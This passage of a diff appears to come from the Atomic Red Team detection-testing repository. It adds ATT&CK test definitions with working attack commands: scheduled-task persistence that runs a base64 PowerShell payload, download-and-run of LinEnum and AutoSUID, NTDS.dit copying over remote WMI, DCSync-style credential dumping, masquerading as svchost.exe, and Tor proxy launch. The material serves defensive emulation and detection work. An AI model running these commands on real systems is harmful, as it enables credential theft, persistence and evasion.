+          schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
+        cleanup_command: |
+          schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
+          reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
+        name: command_prompt
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -65334,6 +66363,73 @@ execution:
 
 '
         name: sh
+    - name: Harvest SUID executable files
+      auto_generated_guid: 46274fc6-08a7-4956-861b-24cbbaa0503c
+      description: "AutoSUID application is the Open-Source project, the main idea
+        of which is to automate harvesting the SUID executable files and to find a
+        way for further escalating the privileges. \n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        autosuid:
+          description: Path to the autosuid shell script
+          type: Path
+          default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
+        autosuid_url:
+          description: Path to download autosuid shell script
+          type: Url
+          default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'AutoSUID must exist on disk at specified location (#{autosuid})
+
+'
+        prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+
+'
+        get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
+
+'
+      executor:
+        command: |
+          chmod +x #{autosuid}
+          bash #{autosuid}
+        name: sh
+    - name: LinEnum tool execution
+      auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
+      description: 'LinEnum is a bash script that performs discovery commands for
+        accounts,processes, kernel version, applications, services, and uses the information
+        from these commands to present operator with ways of escalating privileges
+        or further exploitation of targeted host.
+
+'
+      supported_platforms:
+      - linux
+      input_arguments:
+        linenum:
+          description: Path to the LinEnum shell script
+          type: Path
+          default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
+        linenum_url:
+          description: Path to download LinEnum shell script
+          type: Url
+          default: https://raw.githubusercontent.com/rebootuser/LinEnum/c47f9b226d3ce2848629f25fe142c1b2986bc427/LinEnum.sh
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'LinnEnum must exist on disk at specified location (#{linenum})
+
+'
+        prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+
+'
+        get_prereq_command: 'curl #{linenum_url} --output #{linenum}
+
+'
+      executor:
+        command: |
+          chmod +x #{linenum}
+          bash #{linenum}
+        name: sh
   T1204:
     technique:
       object_marking_refs:
@@ -65466,14 +66562,11 @@ execution:
       - description: Sample script must exist on disk at specified location (#{vbscript})
         prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1} '
         get_prereq_command: |-
-          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "$env:TEMP\sys_info.vbs"
           New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
-          Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+          Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.005/src/sys_info.vbs" -OutFile "#{vbscript}"
       executor:
         command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
-        cleanup_command: |-
-          Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
-          Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
+        cleanup_command: Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
         name: powershell
     - name: Encoded VBS code execution
       auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
@@ -65676,6 +66769,45 @@ execution:
         command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file}
           & type #{output_file}\n"
         name: command_prompt
+    - name: Simulate BlackByte Ransomware Print Bombing
+      auto_generated_guid: 6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+      description: "This test attempts to open a file a specified number of times
+        in Wordpad, then prints the contents. \nIt is designed to mimic BlackByte
+        ransomware's print bombing technique, where tree.dll, which contains the ransom
+        note, is opened in Wordpad 75 times and then printed. \nSee https://redcanary.com/blog/blackbyte-ransomware/.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_to_print:
+          description: File to be opened/printed by Wordpad.
+          type: String
+          default: "$env:temp\\T1059_003note.txt"
+        max_to_print:
+          description: The maximum number of Wordpad windows the test will open/print.
+          type: String
+          default: 75
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'File to print must exist on disk at specified location (#{file_to_print})
+
+'
+        prereq_command: 'if (test-path "#{file_to_print}"){exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'new-item #{file_to_print} -value "This file has been
+          created by T1059.003 Test 4" -Force | Out-Null
+
+'
+      executor:
+        command: 'cmd /c "for /l %x in (1,1,#{max_to_print}) do start wordpad.exe
+          /p #{file_to_print}" | out-null
+
+'
+        cleanup_command: 'stop-process -name wordpad -force -erroraction silentlycontinue
+
+'
+        name: powershell
   T1047:
     technique:
       id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
@@ -70015,7 +71147,131 @@ command-and-control:
       - macOS
       - Windows
       - Network
-    atomic_tests: []
+      identifier: T1090.003
+    atomic_tests:
+    - name: Psiphon
+      auto_generated_guid: 14d55ca0-920e-4b44-8425-37eedd72b173
+      description: |
+        Psiphon 3 is a circumvention tool from Psiphon Inc. that utilizes VPN, SSH and HTTP Proxy technology to provide you
+        with uncensored access to Internet.
+        This process will launch Psiphon 3 and establish a connection. Shortly after it will be shut down via process kill commands.
+        More information can be found about Psiphon using the following urls
+        http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html
+        https://psiphon.ca/faq.html
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt
+
+'
+        prereq_command: 'if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit
+          1}
+
+'
+        get_prereq_command: |
+          if(-not (test-path $env:Temp\proxy-backup.txt)){
+          $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer
+          Set-Content $env:Temp\proxy-backup.txt $Proxy}
+      - description: 'The Psiphon executable must exist in the Downloads folder
+
+'
+        prereq_command: 'if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe"
+          "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe"
+
+'
+      executor:
+        name: powershell
+        command: 'PathToAtomicsFolder\T1090.003\src\Psiphon.bat
+
+'
+        cleanup_command: "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction
+          Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet
+          Settings' -Name \"ProxyServer\" -Value $Proxy}\n"
+    - name: Tor Proxy Usage - Windows
+      auto_generated_guid: 7b9d85e5-c4ce-4434-8060-d3de83595e69
+      description: "This test is designed to launch the tor proxy service, which is
+        what is utilized in the background by the Tor Browser and other applications
+        with add-ons in order to provide onion routing functionality.\nUpon successful
+        execution, the tor proxy will be launched, run for 60 seconds, and then exit.
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        TorExe:
+          description: Location of tor.exe file.
+          type: String
+          default: "$env:temp\\tor\\Tor\\tor.exe"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "tor.exe must be installed on the machine \n"
+        prereq_command: 'if (Test-Path #{TorExe}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          Start-BitsTransfer -Source "https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip" -Destination "$env:temp\tor.zip" -dynamic
+          expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor"
+      executor:
+        command: |
+          invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'
+          sleep -s 60
+          stop-process -name "tor" | out-null
+        name: powershell
+        elevation_required: false
+    - name: Tor Proxy Usage - Debian/Ubuntu
+      auto_generated_guid: 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7
+      description: "This test is designed to launch the tor proxy service, which is
+        what is utilized in the background by the Tor Browser and other applications
+        with add-ons in order to provide onion routing functionality.\nUpon successful
+        execution, the tor proxy service will be launched. \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: "Tor must be installed on the machine \n"
+        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
+          exit 1; fi
+
+'
+        get_prereq_command: 'sudo apt-get -y install tor
+
+'
+      executor:
+        command: "sudo systemctl start tor \n"
+        cleanup_command: 'sudo systemctl stop tor
+
+'
+        name: sh
+    - name: Tor Proxy Usage - MacOS
+      auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da
+      description: "This test is designed to launch the tor proxy service, which is
+        what is utilized in the background by the Tor Browser and other applications
+        with add-ons in order to provide onion routing functionality.\nUpon successful
+        execution, the tor proxy service will be launched. \n"
+      supported_platforms:
+      - macos
+      dependency_executor_name: sh
+      dependencies:
+      - description: "Tor must be installed on the machine \n"
+        prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else
+          exit 1; fi
+
+'
+        get_prereq_command: |
+          if [ ! -x "$(command -v brew --version)" ]; then /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh keystroke return)"; fi
+          brew install tor
+      executor:
+        command: 'osascript -e ''tell application "Terminal" to do script "tor"''
+
+'
+        cleanup_command: 'killall tor > /dev/null 2>&1
+
+'
+        name: sh
   T1026:
     technique:
       id: attack-pattern--99709758-2b96-48f2-a68a-ad7fbd828091

atomics/T1003.003/T1003.003.md

@@ -24,9 +24,11 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #5 - Create Volume Shadow Copy remotely with WMI](#atomic-test-5---create-volume-shadow-copy-remotely-with-wmi)
 
-- [Atomic Test #6 - Create Volume Shadow Copy with Powershell](#atomic-test-6---create-volume-shadow-copy-with-powershell)
+- [Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl](#atomic-test-6---create-volume-shadow-copy-remotely-wmi-with-esentutl)
 
-- [Atomic Test #7 - Create Symlink to Volume Shadow Copy](#atomic-test-7---create-symlink-to-volume-shadow-copy)
+- [Atomic Test #7 - Create Volume Shadow Copy with Powershell](#atomic-test-7---create-volume-shadow-copy-with-powershell)
+
+- [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
 
 
 <br/>
@@ -306,7 +308,55 @@ echo Sorry, can't connect to target host, check: network, firewall or permission
 <br/>
 <br/>
 
-## Atomic Test #6 - Create Volume Shadow Copy with Powershell
+## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl
+This test is intended to be run from a remote workstation with domain admin context.
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| source_path | File to shadow copy | String | c:&#92;windows&#92;ntds&#92;ntds.dit|
+| target_path | Target path of the result file | String | c:&#92;ntds.dit|
+| target_host | IP Address / Hostname you want to target | String | localhost|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
+```
+
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: Target must be a reachable Domain Controller, and current context must be domain admin
+##### Check Prereq Commands:
+```cmd
+wmic /node:"#{target_host}" shadowcopy list brief
+```
+##### Get Prereq Commands:
+```cmd
+echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Create Volume Shadow Copy with Powershell
 This test is intended to be run on a domain Controller.
 
 The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
@@ -341,7 +391,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
 <br/>
 <br/>
 
-## Atomic Test #7 - Create Symlink to Volume Shadow Copy
+## Atomic Test #8 - Create Symlink to Volume Shadow Copy
 This test is intended to be run on a domain Controller.
 
 The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy.

atomics/T1003.003/T1003.003.yaml

@@ -167,6 +167,39 @@ atomic_tests:
     name: command_prompt
     elevation_required: true
 
+- name: Create Volume Shadow Copy remotely (WMI) with esentutl
+  auto_generated_guid: 21c7bf80-3e8b-40fa-8f9d-f5b194ff2865
+  description: |
+    This test is intended to be run from a remote workstation with domain admin context.
+    The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl.
+  supported_platforms:
+  - windows
+  input_arguments:
+    source_path:
+      description: File to shadow copy
+      type: String
+      default: 'c:\windows\ntds\ntds.dit'
+    target_path:
+      description: Target path of the result file
+      type: String
+      default: 'c:\ntds.dit'
+    target_host:
+      description: IP Address / Hostname you want to target
+      type: String
+      default: localhost
+  dependencies:
+  - description: |
+      Target must be a reachable Domain Controller, and current context must be domain admin
+    prereq_command: |
+      wmic /node:"#{target_host}" shadowcopy list brief
+    get_prereq_command: |
+      echo Sorry, can't connect to target host, check: network, firewall or permissions (must be admin on target)
+  executor:
+    command: |
+      wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"
+    name: command_prompt
+    elevation_required: true
+
 - name: Create Volume Shadow Copy with Powershell
   auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24
   description: |

atomics/T1003.005.yaml

@@ -0,0 +1,17 @@
+attack_technique: T1003.005
+display_name: 'OS Credential Dumping: Cached Domain Credentials'
+atomic_tests:
+- name: Cached Credential Dump via Cmdkey
+  description: |
+    List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
+    Credentials listed with Cmdkey only pertain to the current user
+    Passwords will not be displayed once they are stored
+    https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
+    https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
+  supported_platforms:
+    - windows
+  executor:
+  - name: command_prompt
+    elevation_required: false
+    command: |
+      cmdkey /list

atomics/T1003.006/T1003.006.md

@@ -10,6 +10,8 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
 
 - [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
 
+- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
+
 
 <br/>
 
@@ -66,4 +68,54 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Run DSInternals Get-ADReplAccount
+The following Atomic will run Get-ADReplAccount from DSInternals.
+Upon successful execution, domain and credentials will appear in stdout. 
+[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Get-ADReplAccount -All -Server #{logonserver}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DSInternals must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name DSInternals -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name DSInternals -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>

atomics/T1003.006/T1003.006.yaml

@@ -42,3 +42,33 @@ atomic_tests:
     elevation_required: false
     command: |
       #{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
+
+- name: Run DSInternals Get-ADReplAccount
+  auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
+  description: |
+    The following Atomic will run Get-ADReplAccount from DSInternals.
+    Upon successful execution, domain and credentials will appear in stdout. 
+    [Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
+    https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
+  supported_platforms:
+  - windows
+  input_arguments:
+    logonserver:
+      description: ComputerName argument default %logonserver%
+      type: String
+      default: $ENV:logonserver.TrimStart("\")
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      DSInternals must be installed
+    prereq_command: |
+      $RequiredModule = Get-Module -Name DSInternals -ListAvailable
+      if (-not $RequiredModule) {exit 1}
+      if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
+    get_prereq_command: |
+      Install-Module -Name DSInternals -Scope CurrentUser -Force
+  executor:
+    command: |
+      Get-ADReplAccount -All -Server #{logonserver}
+    name: powershell
+    elevation_required: False

atomics/T1018/T1018.md

@@ -34,6 +34,8 @@ Specific to macOS, the <code>bonjour</code> protocol exists to discover addition
 
 - [Atomic Test #14 - Remote System Discovery - ip tcp_metrics](#atomic-test-14---remote-system-discovery---ip-tcp_metrics)
 
+- [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
+
 
 <br/>
 
@@ -583,4 +585,53 @@ apt-get install iproute2 -y
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher
+This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
+This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
+Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
+Upon successful execution, this test will output the names of the computers that reside on the domain to the console window.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 962a6017-1c09-45a6-880b-adc9c57cb22e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
+$DirectorySearcher.PropertiesToLoad.Add("Name")
+$Computers = $DirectorySearcher.findall()
+foreach ($Computer in $Computers) {
+  $Computer = $Computer.Properties.name
+  if (!$Computer) { Continue }
+  Write-Host $Computer}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: This PC must be joined to a domain.
+##### Check Prereq Commands:
+```powershell
+if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "This PC must be manually added to a domain."
+```
+
+
+
+
 <br/>

atomics/T1018/T1018.yaml

@@ -283,4 +283,30 @@ atomic_tests:
     command: |
       ip tcp_metrics show |grep --invert-match "^127\."
     name: sh
-
+- name: Enumerate domain computers within Active Directory using DirectorySearcher
+  auto_generated_guid: 962a6017-1c09-45a6-880b-adc9c57cb22e
+  description: |
+    This test is a Powershell script that enumerates Active Directory to determine computers that are joined to the domain. 
+    This test is designed to mimic how SessionGopher can determine the additional systems within a domain, which has been used before by threat actors to aid in lateral movement. 
+    Reference: [Head Fake: Tackling Disruptive Ransomware Attacks](https://www.mandiant.com/resources/head-fake-tackling-disruptive-ransomware-attacks). 
+    Upon successful execution, this test will output the names of the computers that reside on the domain to the console window. 
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: This PC must be joined to a domain. 
+    prereq_command: |-
+     if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1}		
+    get_prereq_command: |-
+      write-host "This PC must be manually added to a domain." 
+  executor:
+    command: |
+      $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher("(ObjectCategory=Computer)")
+      $DirectorySearcher.PropertiesToLoad.Add("Name")
+      $Computers = $DirectorySearcher.findall()
+      foreach ($Computer in $Computers) {
+        $Computer = $Computer.Properties.name
+        if (!$Computer) { Continue }
+        Write-Host $Computer}
+    name: powershell
+    elevation_required: false

atomics/T1036.005/T1036.005.md

@@ -8,6 +8,8 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
 
 - [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory)
 
+- [Atomic Test #2 - Masquerade as a built-in system executable](#atomic-test-2---masquerade-as-a-built-in-system-executable)
+
 
 <br/>
 
@@ -48,4 +50,49 @@ rmdir $HOME/.../
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Masquerade as a built-in system executable
+Launch an executable that attempts to masquerade as a legitimate executable.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| executable_filepath | File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. | String | $Env:windir&#92;Temp&#92;svchost.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -TypeDefinition @'
+public class Test {
+    public static void Main(string[] args) {
+        System.Console.WriteLine("tweet, tweet");
+    }
+}
+'@ -OutputAssembly "#{executable_filepath}"
+
+Start-Process -FilePath "#{executable_filepath}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1036.005/T1036.005.yaml

@@ -1,23 +1,18 @@
----
 attack_technique: T1036.005
 display_name: 'Masquerading: Match Legitimate Name or Location'
-
 atomic_tests:
 - name: Execute a process from a directory masquerading as the current parent directory.
   auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24
   description: |
     Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
-
   supported_platforms:
     - macos
     - linux
-
   input_arguments:
     test_message:
       description: Test message to echo out to the screen
       type: String
       default: Hello from the Atomic Red Team test T1036.005#1
-
   executor:
     name: sh
     elevation_required: false
@@ -28,3 +23,28 @@ atomic_tests:
     cleanup_command: |
       rm -f $HOME/.../sh
       rmdir $HOME/.../
+- name: Masquerade as a built-in system executable
+  auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+  description: |
+    Launch an executable that attempts to masquerade as a legitimate executable.
+  supported_platforms:
+  - windows
+  input_arguments:
+    executable_filepath:
+      description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
+      type: String
+      default: $Env:windir\Temp\svchost.exe
+  executor:
+    command: |
+      Add-Type -TypeDefinition @'
+      public class Test {
+          public static void Main(string[] args) {
+              System.Console.WriteLine("tweet, tweet");
+          }
+      }
+      '@ -OutputAssembly "#{executable_filepath}"
+      
+      Start-Process -FilePath "#{executable_filepath}"
+    cleanup_command: |
+      Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
+    name: powershell

atomics/T1036/T1036.md

@@ -8,6 +8,8 @@ Renaming abusable system utilities to evade security monitoring is also a form o
 
 - [Atomic Test #1 - System File Copied to Unusual Location](#atomic-test-1---system-file-copied-to-unusual-location)
 
+- [Atomic Test #2 - Malware Masquerading and Execution from Zip File](#atomic-test-2---malware-masquerading-and-execution-from-zip-file)
+
 
 <br/>
 
@@ -41,4 +43,56 @@ del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Malware Masquerading and Execution from Zip File
+When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 4449c89b-ec82-43a4-89c1-91e2f1abeecc
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| url | Location of zip file | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+cd $env:userprofile\Downloads\T1036
+cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+```
+
+#### Cleanup Commands:
+```powershell
+taskkill /IM Calculator.exe /f >$null 2>$null
+Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Zip file must be present.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+```
+
+
+
+
 <br/>

atomics/T1036/T1036.yaml

@@ -2,7 +2,7 @@ attack_technique: T1036
 display_name: "Masquerading"
 atomic_tests:
 - name: System File Copied to Unusual Location
-  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+  auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
   description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
   supported_platforms:
   - windows
@@ -11,4 +11,29 @@ atomic_tests:
       copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
       start %ALLUSERSPROFILE%\cmd.exe
     cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
-    name: command_prompt
+    name: command_prompt
+- name: Malware Masquerading and Execution from Zip File
+  auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
+  description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+  supported_platforms:
+  - windows
+  input_arguments:
+    url:
+      description: Location of zip file
+      type: Url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
+  dependencies:
+  - description: Zip file must be present.
+    prereq_command: |
+      if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+  executor:
+    command: |-
+      Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+      cd $env:userprofile\Downloads\T1036
+      cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+    cleanup_command: |-
+      taskkill /IM Calculator.exe /f >$null 2>$null
+      Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
+    name: powershell

atomics/T1040/T1040.md

@@ -58,7 +58,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```
 
 
@@ -106,7 +106,7 @@ if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exi
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```
 
 

atomics/T1040/T1040.yaml

@@ -21,7 +21,7 @@ atomic_tests:
       prereq_command: |
         if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
       get_prereq_command: |
-        (which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
+        (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
   executor:
     command: |
       tcpdump -c 5 -nnni #{interface}
@@ -48,7 +48,7 @@ atomic_tests:
       prereq_command: |
         if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
       get_prereq_command: |
